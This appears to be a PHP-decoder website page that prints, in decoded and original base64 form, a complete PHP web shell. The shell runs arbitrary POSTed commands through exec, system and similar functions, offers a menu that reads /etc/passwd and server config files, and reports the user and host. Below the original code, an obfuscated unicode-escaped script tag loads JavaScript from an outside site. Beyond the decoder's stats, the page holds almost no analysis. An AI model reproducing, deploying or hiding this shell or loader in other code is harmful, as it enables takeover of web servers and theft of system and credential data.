Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php eval(base64_decode('ZnVuY3Rpb24gc2FmZXNoZWxsKCRrb211dCkgCnsgCmluaV9yZXN0b3JlKCJzY..

Decoded Output download

function safeshell($komut) 
{ 
ini_restore("safe_mode");
ini_restore("open_basedir");
 $res = ''; 
 if (!empty($komut)) 
 { 
if(function_exists('exec')) 
{ 
 @exec($komut,$res); 
 $res = join("
",$res); 
} 
elseif(function_exists('shell_exec')) 
{ 
 $res = @shell_exec($komut); 
} 
elseif(function_exists('system')) 
{ 
 @ob_start(); 
 @system($komut); 
 $res = @ob_get_contents(); 
 @ob_end_clean(); 
} 
elseif(function_exists('passthru')) 
{ 
 @ob_start(); 
 @passthru($komut); 
 $res = @ob_get_contents(); 
 @ob_end_clean(); 
} 
elseif(@is_resource($f = @popen($komut,"r"))) 
{ 
$res = ""; 
while(!@feof($f)) { $res .= @fread($f,1024); } 
@pclose($f); 
} 
 } 
 return $res; 
}
echo "<b><font color=blue>Liz0ziM Private Safe Mode Command Execution Bypass Exploit</font></b><br>";
print_r('
<pre>
<form method="POST" action="">
<b><font color=blue>Komut :</font></b><input name="baba" type="text"><input value="?al??t?r" type="submit">
</form>
<form method="POST" action="">
<b><font color=blue>H?zl? Men? :=) :</font><select size="1" name="liz0">
<option value="cat /etc/passwd">/etc/passwd</option>
<option value="netstat -an | grep -i listen">Tm Ak Portalar Gr</option>
<option value="cat /var/cpanel/accounting.log">/var/cpanel/accounting.log</option>
<option value="cat /etc/syslog.conf">/etc/syslog.conf</option>
<option value="cat /etc/hosts">/etc/hosts</option>
<option value="cat /etc/named.conf">/etc/named.conf</option>
<option value="cat /etc/httpd/conf/httpd.conf">/etc/httpd/conf/httpd.conf</option>
</select> <input type="submit" value="Gster Bakim">
</form>
</pre>
');
ini_restore("safe_mode");
ini_restore("open_basedir");
if($_POST[baba]!= "") { $liz0=safeshell($_POST[baba]); }
if($_POST[liz0]!= "") { $liz0zim=safeshell($_POST[liz0]); }
$uid=safeshell('id');
$server=safeshell('uname -a');
echo "<pre><h4>";
echo "<b><font color=red>Kimim Ben :=)</font></b>:$uid<br>";
echo "<b><font color=red>Server</font></b>:$server<br>";
echo "<b><font color=red>Komut Sonuular:</font></b><br>"; 
if($_POST["baba"]!= "") { echo $liz0; }
if($_POST["liz0"]!= "") { echo $liz0zim; }
echo "</h4></pre>";

Did this file decode correctly?

Original Code

<?php

eval(base64_decode('ZnVuY3Rpb24gc2FmZXNoZWxsKCRrb211dCkgCnsgCmluaV9yZXN0b3JlKCJzYWZlX21vZGUiKTsKaW5pX3Jlc3RvcmUoIm9wZW5fYmFzZWRpciIpOwogJHJlcyA9ICcnOyAKIGlmICghZW1wdHkoJGtvbXV0KSkgCiB7IAppZihmdW5jdGlvbl9leGlzdHMoJ2V4ZWMnKSkgCnsgCiBAZXhlYygka29tdXQsJHJlcyk7IAogJHJlcyA9IGpvaW4oIlxuIiwkcmVzKTsgCn0gCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3NoZWxsX2V4ZWMnKSkgCnsgCiAkcmVzID0gQHNoZWxsX2V4ZWMoJGtvbXV0KTsgCn0gCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3N5c3RlbScpKSAKeyAKIEBvYl9zdGFydCgpOyAKIEBzeXN0ZW0oJGtvbXV0KTsgCiAkcmVzID0gQG9iX2dldF9jb250ZW50cygpOyAKIEBvYl9lbmRfY2xlYW4oKTsgCn0gCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1JykpIAp7IAogQG9iX3N0YXJ0KCk7IAogQHBhc3N0aHJ1KCRrb211dCk7IAogJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsgCiBAb2JfZW5kX2NsZWFuKCk7IAp9IAplbHNlaWYoQGlzX3Jlc291cmNlKCRmID0gQHBvcGVuKCRrb211dCwiciIpKSkgCnsgCiRyZXMgPSAiIjsgCndoaWxlKCFAZmVvZigkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0gCkBwY2xvc2UoJGYpOyAKfSAKIH0gCiByZXR1cm4gJHJlczsgCn0KZWNobyAiPGI+PGZvbnQgY29sb3I9Ymx1ZT5MaXowemlNIFByaXZhdGUgU2FmZSBNb2RlIENvbW1hbmQgRXhlY3V0aW9uIEJ5cGFzcyBFeHBsb2l0PC9mb250PjwvYj48YnI+IjsKcHJpbnRfcignCjxwcmU+Cjxmb3JtIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIiPgo8Yj48Zm9udCBjb2xvcj1ibHVlPktvbXV0IDo8L2ZvbnQ+PC9iPjxpbnB1dCBuYW1lPSJiYWJhIiB0eXBlPSJ0ZXh0Ij48aW5wdXQgdmFsdWU9Ij9hbD8/dD9yIiB0eXBlPSJzdWJtaXQiPgo8L2Zvcm0+Cjxmb3JtIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIiPgo8Yj48Zm9udCBjb2xvcj1ibHVlPkg/emw/IE1lbj8gOj0pIDo8L2ZvbnQ+PHNlbGVjdCBzaXplPSIxIiBuYW1lPSJsaXowIj4KPG9wdGlvbiB2YWx1ZT0iY2F0IC9ldGMvcGFzc3dkIj4vZXRjL3Bhc3N3ZDwvb3B0aW9uPgo8b3B0aW9uIHZhbHVlPSJuZXRzdGF0IC1hbiB8IGdyZXAgLWkgbGlzdGVuIj5Uw7xtIEHDp8O9ayBQb3J0YWxhcsO9IEfDtnI8L29wdGlvbj4KPG9wdGlvbiB2YWx1ZT0iY2F0IC92YXIvY3BhbmVsL2FjY291bnRpbmcubG9nIj4vdmFyL2NwYW5lbC9hY2NvdW50aW5nLmxvZzwvb3B0aW9uPgo8b3B0aW9uIHZhbHVlPSJjYXQgL2V0Yy9zeXNsb2cuY29uZiI+L2V0Yy9zeXNsb2cuY29uZjwvb3B0aW9uPgo8b3B0aW9uIHZhbHVlPSJjYXQgL2V0Yy9ob3N0cyI+L2V0Yy9ob3N0czwvb3B0aW9uPgo8b3B0aW9uIHZhbHVlPSJjYXQgL2V0Yy9uYW1lZC5jb25mIj4vZXRjL25hbWVkLmNvbmY8L29wdGlvbj4KPG9wdGlvbiB2YWx1ZT0iY2F0IC9ldGMvaHR0cGQvY29uZi9odHRwZC5jb25mIj4vZXRjL2h0dHBkL2NvbmYvaHR0cGQuY29uZjwvb3B0aW9uPgo8L3NlbGVjdD4gPGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkfDtnN0ZXIgQmFraW0iPgo8L2Zvcm0+CjwvcHJlPgonKTsKaW5pX3Jlc3RvcmUoInNhZmVfbW9kZSIpOwppbmlfcmVzdG9yZSgib3Blbl9iYXNlZGlyIik7CmlmKCRfUE9TVFtiYWJhXSE9ICIiKSB7ICRsaXowPXNhZmVzaGVsbCgkX1BPU1RbYmFiYV0pOyB9CmlmKCRfUE9TVFtsaXowXSE9ICIiKSB7ICRsaXowemltPXNhZmVzaGVsbCgkX1BPU1RbbGl6MF0pOyB9CiR1aWQ9c2FmZXNoZWxsKCdpZCcpOwokc2VydmVyPXNhZmVzaGVsbCgndW5hbWUgLWEnKTsKZWNobyAiPHByZT48aDQ+IjsKZWNobyAiPGI+PGZvbnQgY29sb3I9cmVkPktpbWltIEJlbiA6PSk8L2ZvbnQ+PC9iPjokdWlkPGJyPiI7CmVjaG8gIjxiPjxmb250IGNvbG9yPXJlZD5TZXJ2ZXI8L2ZvbnQ+PC9iPjokc2VydmVyPGJyPiI7CmVjaG8gIjxiPjxmb250IGNvbG9yPXJlZD5Lb211dCBTb251dcOnbGFyw706PC9mb250PjwvYj48YnI+IjsgCmlmKCRfUE9TVFsiYmFiYSJdIT0gIiIpIHsgZWNobyAkbGl6MDsgfQppZigkX1BPU1RbImxpejAiXSE9ICIiKSB7IGVjaG8gJGxpejB6aW07IH0KZWNobyAiPC9oND48L3ByZT4iOw=='));

?>


<script type="text/javascript">document.write('\u003c\u0053\u0043\u0052\u0049\u0050\u0054\u0020\u0053\u0052\u0043\u003d\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0073\u0069\u0062\u0065\u0072\u0073\u0061\u0076\u0061\u0073\u0063\u0069\u006c\u0061\u0072\u002e\u0063\u006f\u006d\u002f\u0078\u002f\u0069\u006d\u0067\u002e\u006a\u0073\u003e\u003c\u002f\u0053\u0043\u0052\u0049\u0050\u0054\u003e\u000a')</script>

Function Calls

base64_decode 1

Variables

None

Stats

MD5 b2a21a41fc9a9cb0cc427261923726be
Eval Count 1
Decode Time 90 ms